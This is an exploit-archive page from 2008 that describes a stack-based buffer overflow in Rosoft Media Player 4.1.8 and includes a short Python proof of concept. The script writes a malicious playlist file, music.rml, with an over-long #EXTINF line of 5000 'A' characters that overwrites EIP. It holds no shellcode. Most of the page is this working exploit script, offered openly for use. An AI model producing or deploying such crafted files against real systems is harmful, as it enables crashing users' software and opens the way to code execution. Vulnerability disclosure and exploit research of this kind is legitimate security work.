Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC
# Published : 2008-03-15
# Author : Wiktor Sierocinski
# Previous Title : Home FTP Server 1.4.5 Remote Denial of Service Exploit
# Next Title : SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC

Description:
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. 
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before. 

Author: Wiktor Sierocinski
POC:

#!/usr/bin/python

content = (
"#EXTINF:Played=0n" + "A" * 5000 + "n"
)

fd = open("music.rml","w");
fd.write(content)
fd.close();

print "RML FILE CREATED"

# www.Syue.com [2008-03-15]